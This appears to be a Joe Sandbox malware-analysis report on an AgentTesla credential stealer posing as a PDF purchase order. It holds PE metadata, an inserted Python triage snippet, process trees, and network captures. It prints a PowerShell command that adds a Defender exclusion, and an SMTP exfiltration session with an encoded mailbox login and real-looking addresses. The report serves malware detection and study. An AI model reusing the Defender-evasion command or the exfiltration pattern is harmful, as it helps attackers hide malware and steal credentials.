                              SSDEEP:24:3OWSKco4KmZjKbmOIKod6lss4RPQoUP7mZ9t7J0gt/NKIl9ia8Hu:eWSU4xympgv4RIoUP7mZ9tK8NDT
                              MD5:DD7816BEEA4989ED1A1D1396992A30B1
                              SHA1:84BA04B6A2816B26B6B118CC9BDB38D6EA2ABA79
                              SHA-256:C2938579FF73C4598BABE96563909FAE320E2189B4D3C307B25661FF5710AEB2
                              SHA-512:542656ED2366F9FD388F4A39AE9852B3EDDB2EA055A7F41B6FC646FB44ADD34576DCE52D46145EFD62998C8B2053432DF1B6C3402C66FC33CAB88C4AFE0184DD
                              Malicious:false
                              Reputation:low
                              Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):856064
                              Entropy (8bit):7.881527902955562
                              Encrypted:false
                              SSDEEP:24576:Yw4bjw4bJWBbDcr6vNVIbKADy2VqC5yYOWMU/fpTMnp7:Yw4bjw4bARE6FWbKegCEYOWMU5TMR
                              MD5:B90266D6B73DB4F10B1CC8F90A81A4AA
                              SHA1:9422DD5935C7299DA1C6C8B7B5E0E9E89743DDFB
                              SHA-256:B5E9A3A112C889E9AFAA48926ED0BF9474FB430CC99DFF8915192877F58D5EFE
                              SHA-512:AED559705834AEDCE48808F2225D2657C59EC24F2766BAE56750544D9507FB47B05B8EFE7690CFBA769031954E6437895910828FC68A17F9B2602BAA34A78828
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 37%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:N...............0......@........... ........@.. .......................@............@.................................t...O........%................... ......X................................................ ............... ..H............text....... ...................... ..`.rsrc....%.......0..................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0
                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.881527902955562
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                              • Win32 Executable (generic) a (10002005/4) 49.78%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              File name:baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                              File size:856'064 bytes
                              MD5:b90266d6b73db4f10b1cc8f90a81a4aa
                              SHA1:9422dd5935c7299da1c6c8b7b5e0e9e89743ddfb
                              SHA256:b5e9a3a112c889e9afaa48926ed0bf9474fb430cc99dff8915192877f58d5efe
                              SHA512:aed559705834aedce48808f2225d2657c59ec24f2766bae56750544d9507fb47b05b8efe7690cfba769031954e6437895910828fc68a17f9b2602baa34a78828
                              SSDEEP:24576:Yw4bjw4bJWBbDcr6vNVIbKADy2VqC5yYOWMU/fpTMnp7:Yw4bjw4bARE6FWbKegCEYOWMU5TMR
                              TLSH:D9051260F3F94B40E57997F6902112944BFAB8ABB576E31C0CC161DF69B1B408B52F2B
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:N...............0......@........... ........@.. .......................@............@................................
                              Icon Hash:1b62dc9ddb63329b
                              Entrypoint:0x4cddc6
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0xAA4E3A0D [Sat Jul 17 01:29:49 2060 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
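Two static fields above drive signatures in this report: the 8-bit entropy of 7.88 (behind "Software Packing") and the COFF TimeDateStamp 0xAA4E3A0D, which decodes to July 2060 (behind "Binary contains a suspicious time stamp"). The following is an added example, not code from the report or from Joe Sandbox: it computes the same entropy figure, reads TimeDateStamp straight from the PE headers, and flags both conditions. The packing threshold of 7.0 bits per byte, the comparison against the report's analysis date, and the header-only stub built as input (it is not a runnable PE) are assumptions made for the example.

```python
import math
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone

ANALYSIS_DATE = datetime(2024, 5, 22, tzinfo=timezone.utc)   # analysis start date from this report
REPORT_TIMESTAMP = 0xAA4E3A0D                                 # COFF TimeDateStamp from this report
PACKED_THRESHOLD = 7.0                                        # assumed heuristic, bits per byte


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0); the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_timestamp(ts: int) -> datetime:
    """COFF TimeDateStamp is seconds since 1970-01-01 UTC; add rather than
    use fromtimestamp() so post-2038 values work on every platform."""
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=ts)


def read_pe_timestamp(pe: bytes) -> int:
    """e_lfanew sits at offset 0x3C; the COFF header follows the 'PE\\0\\0'
    signature as Machine(2) NumberOfSections(2) TimeDateStamp(4) ..."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return struct.unpack_from("<I", pe, e_lfanew + 8)[0]


def triage(pe: bytes, observed: datetime = ANALYSIS_DATE) -> dict:
    """Static checks that reproduce two of the report's signatures."""
    ent = shannon_entropy(pe)
    ts = pe_timestamp(read_pe_timestamp(pe))
    return {
        "entropy": round(ent, 3),
        "likely_packed": ent > PACKED_THRESHOLD,
        "timestamp": ts.isoformat(),
        "timestamp_in_future": ts > observed,
    }


def build_minimal_pe(timestamp: int, payload: bytes) -> bytes:
    """Constructed input: DOS stub + COFF header + payload. Header-only, not loadable."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 3, timestamp, 0, 0, 0xE0, 0x2102)
    return bytes(dos) + coff + payload


if __name__ == "__main__":
    packed = build_minimal_pe(REPORT_TIMESTAMP, bytes(range(256)) * 16)   # high-entropy body
    plain = build_minimal_pe(0x5F000000, b"\x00" * 4096)                 # low-entropy body, 2020 stamp
    print(triage(packed))
    print(triage(plain))
```

For a .NET assembly, a future or otherwise implausible timestamp is common (the compiler can emit a reproducible-build hash in that field), so the timestamp check is a triage prompt rather than a verdict; the entropy figure, computed over the whole image as the report does, is the stronger of the two signals here.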
                              Instruction
                              jmp dword ptr [00402000h]
                              Name                                  Virtual Address  Virtual Size  Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT          0xcdd74          0x4f          .text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE        0xce000          0x258c        .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC       0xd2000          0xc           .reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG           0xcdd58          0x1c          .text
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                              IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                              Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy               Characteristics
                              .text   0x2000           0xcbdcc       0xcc000   ca6f0bed309a940ccf1cd02c69a8e651  False     0.9320606904871324  data       7.925581129662268     IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc   0xce000          0x258c        0x3000    372c5a35c0c3c6a311699f358c1097f1  False     0.692626953125      data       6.366466962574619     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc  0xd2000          0xc           0x1000    6da3e67b656cfcc86f5baaa49bf27d07  False     0.0087890625        data       0.015920183265625623  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              Name           RVA      Size    Type                                                                                Language  Country  ZLIB Complexity
                              RT_ICON        0xce100  0x1ec0  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                                            0.9712906504065041
                              RT_GROUP_ICON  0xcffd0  0x14    data                                                                                                   1.05
                              RT_VERSION     0xcfff4  0x398   OpenPGP Public Key                                                                                     0.42282608695652174
                              RT_MANIFEST    0xd039c  0x1ea   XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347

                              DLL          Import
                              mscoree.dll  _CorExeMain
                              TCP packets

                              Timestamp                            Source Port  Dest Port  Source IP      Dest IP
                              May 22, 2024 22:05:34.995316029 CEST  59154        587        192.168.2.9    185.81.155.88
                              May 22, 2024 22:05:35.001368999 CEST  587          59154      185.81.155.88  192.168.2.9
                              May 22, 2024 22:05:35.001435041 CEST  59154        587        192.168.2.9    185.81.155.88
                              May 22, 2024 22:05:35.960376978 CEST  587          59154      185.81.155.88  192.168.2.9
                              May 22, 2024 22:05:35.961457014 CEST  59154        587        192.168.2.9    185.81.155.88
                              May 22, 2024 22:05:35.966341019 CEST  587          59154      185.81.155.88  192.168.2.9
                              May 22, 2024 22:05:36.235937119 CEST  587          59154      185.81.155.88  192.168.2.9
                              May 22, 2024 22:05:36.236921072 CEST  59154        587        192.168.2.9    185.81.155.88
                              May 22, 2024 22:05:36.241884947 CEST  587          59154      185.81.155.88  192.168.2.9
                              May 22, 2024 22:05:36.465868950 CEST  587          59154      185.81.155.88  192.168.2.9
                              May 22, 2024 22:05:36.466986895 CEST  59154        587        192.168.2.9    185.81.155.88
                              May 22, 2024 22:05:36.488018036 CEST  587          59154      185.81.155.88  192.168.2.9
                              May 22, 2024 22:05:36.757276058 CEST  587          59154      185.81.155.88  192.168.2.9
                              May 22, 2024 22:05:36.761012077 CEST  59154        587        192.168.2.9    185.81.155.88
                              May 22, 2024 22:05:36.766972065 CEST  587          59154      185.81.155.88  192.168.2.9
                              May 22, 2024 22:05:36.986787081 CEST  587          59154      185.81.155.88  192.168.2.9
                              May 22, 2024 22:05:36.986973047 CEST  59154        587        192.168.2.9    185.81.155.88
                              May 22, 2024 22:05:36.992249966 CEST  587          59154      185.81.155.88  192.168.2.9
                              May 22, 2024 22:05:37.234474897 CEST  587          59154      185.81.155.88  192.168.2.9
                              May 22, 2024 22:05:37.239279985 CEST  587          59154      185.81.155.88  192.168.2.9
                              May 22, 2024 22:05:37.241064072 CEST  59154        587        192.168.2.9    185.81.155.88
                              May 22, 2024 22:05:37.245735884 CEST  59154        587        192.168.2.9    185.81.155.88
                              May 22, 2024 22:05:37.297692060 CEST  587          59154      185.81.155.88  192.168.2.9
                              UDP packets

                              Timestamp                            Source Port  Dest Port  Source IP     Dest IP
                              May 22, 2024 22:04:42.011518002 CEST  53           49449      162.159.36.2  192.168.2.9
                              May 22, 2024 22:04:42.548281908 CEST  53           53085      1.1.1.1       192.168.2.9
                              May 22, 2024 22:05:34.865268946 CEST  65106        53         192.168.2.9   1.1.1.1
                              May 22, 2024 22:05:34.988101959 CEST  53           65106      1.1.1.1       192.168.2.9

                              DNS queries

                              Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                  Type            Class        DNS over HTTPS
                              May 22, 2024 22:05:34.865268946 CEST  192.168.2.9  1.1.1.1  0x9426    Standard query (0)  mail.saralgumruk.com  A (IP address)  IN (0x0001)  false

                              DNS answers

                              Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                  CName  Address        Type            Class        DNS over HTTPS
                              May 22, 2024 22:05:34.988101959 CEST  1.1.1.1    192.168.2.9  0x9426    No error (0)  mail.saralgumruk.com         185.81.155.88  A (IP address)  IN (0x0001)  false
                              SMTP conversation

                              Timestamp                            Source Port  Dest Port  Source IP      Dest IP        Commands
                              May 22, 2024 22:05:35.960376978 CEST  587          59154      185.81.155.88  192.168.2.9    220 server.hostisi.com ESMTP Exim 4.96 Wed, 22 May 2024 22:53:12 +0300
                              May 22, 2024 22:05:35.961457014 CEST  59154        587        192.168.2.9    185.81.155.88  EHLO 134349
                              May 22, 2024 22:05:36.235937119 CEST  587          59154      185.81.155.88  192.168.2.9    250-server.hostisi.com Hello 134349 [8.46.123.175]
                                                                                                                          250-SIZE 52428800
                                                                                                                          250-8BITMIME
                                                                                                                          250-PIPELINING
                                                                                                                          250-PIPECONNECT
                                                                                                                          250-AUTH PLAIN LOGIN
                                                                                                                          250-STARTTLS
                                                                                                                          250 HELP
                              May 22, 2024 22:05:36.236921072 CEST  59154        587        192.168.2.9    185.81.155.88  AUTH login c3lpbG1hekBzYXJhbGd1bXJ1ay5jb20=
                              May 22, 2024 22:05:36.465868950 CEST  587          59154      185.81.155.88  192.168.2.9    334 UGFzc3dvcmQ6
                              May 22, 2024 22:05:36.757276058 CEST  587          59154      185.81.155.88  192.168.2.9    235 Authentication succeeded
                              May 22, 2024 22:05:36.761012077 CEST  59154        587        192.168.2.9    185.81.155.88  MAIL FROM:<syilmaz@saralgumruk.com>
                              May 22, 2024 22:05:36.986787081 CEST  587          59154      185.81.155.88  192.168.2.9    250 OK
                              May 22, 2024 22:05:36.986973047 CEST  59154        587        192.168.2.9    185.81.155.88  RCPT TO:<phinametics247@gmail.com>
                              May 22, 2024 22:05:37.234474897 CEST  587          59154      185.81.155.88  192.168.2.9    550 User account syilmaz@saralgumruk.com has sent too many emails
                              Target ID:5
                              Start time:16:03:55
                              Start date:22/05/2024
                              Path:C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
                              Imagebase:0x470000
                              File size:856'064 bytes
                              MD5 hash:B90266D6B73DB4F10B1CC8F90A81A4AA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1325496333.00000000044B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1325496333.00000000044B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1325496333.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1325496333.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:7
                              Start time:16:03:56
                              Start date:22/05/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
                              Imagebase:0xe70000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:16:03:56
                              Start date:22/05/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:16:03:56
                              Start date:22/05/2024
                              Path:C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
                              Imagebase:0x780000
                              File size:856'064 bytes
                              MD5 hash:B90266D6B73DB4F10B1CC8F90A81A4AA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2545517189.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:false

                              Target ID:10
                              Start time:16:04:10
                              Start date:22/05/2024
                              Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                              Imagebase:0xc30000
                              File size:856'064 bytes
                              MD5 hash:B90266D6B73DB4F10B1CC8F90A81A4AA
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1486766690.00000000043BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1486766690.00000000043BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 37%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              Target ID:12
                              Start time:16:04:13
                              Start date:22/05/2024
                              Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                              Imagebase:0x650000
                              File size:856'064 bytes
                              MD5 hash:B90266D6B73DB4F10B1CC8F90A81A4AA
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.1545932299.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.1545932299.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.1548552550.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:13
                              Start time:16:04:20
                              Start date:22/05/2024
                              Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                              Imagebase:0x910000
                              File size:856'064 bytes
                              MD5 hash:B90266D6B73DB4F10B1CC8F90A81A4AA
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1575415406.000000000409F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1575415406.000000000409F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:14
                              Start time:16:04:21
                              Start date:22/05/2024
                              Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                              Imagebase:0x7e0000
                              File size:856'064 bytes
                              MD5 hash:B90266D6B73DB4F10B1CC8F90A81A4AA
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2544912217.0000000002C3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:false
                                Execution Graph

                                Execution Coverage:10.4%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:188
                                Total number of Limit Nodes:7
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0271D136
                                • GetCurrentThread.KERNEL32 ref: 0271D173
                                • GetCurrentProcess.KERNEL32 ref: 0271D1B0
                                • GetCurrentThreadId.KERNEL32 ref: 0271D209
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0271D136
                                • GetCurrentThread.KERNEL32 ref: 0271D173
                                • GetCurrentProcess.KERNEL32 ref: 0271D1B0
                                • GetCurrentThreadId.KERNEL32 ref: 0271D209
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 9984c2ab1eabada456b1f6af9d2009f27a5d44c11d0f89633788797e90115a37
                                • Instruction ID: 8629c691622f895b5dcfb6fbfc2a552a5db465b6fd62bc45c281c3b102d2e057
                                • Opcode Fuzzy Hash: 9984c2ab1eabada456b1f6af9d2009f27a5d44c11d0f89633788797e90115a37
                                • Instruction Fuzzy Hash: F05146B09007098FDB54DFAAD548BDEBBF1EF48314F208069E459A7350DB74A984CF65

                                Control-flow Graph (rendered graph): basic blocks 5e966a4-5e969f5, API call CreateProcessA
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05E968E6
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 2e0d6f44b376d8975334f6caf00eb2881f45c1f7f28d634b105682ed3a5e1a0f
                                • Instruction ID: 06a03a563367d3bf9fb5ec2fc405ec4a92d6e6349cf27f96800adaf22d9dcf53
                                • Opcode Fuzzy Hash: 2e0d6f44b376d8975334f6caf00eb2881f45c1f7f28d634b105682ed3a5e1a0f
                                • Instruction Fuzzy Hash: 9CA15B71D00219DFEF24CF68C945BEDBBB2BF48304F1485AAD899A7240DB749985CF91

                                Control-flow Graph (rendered graph): basic blocks 5e966b0-5e969f5, API call CreateProcessA
                                APIs
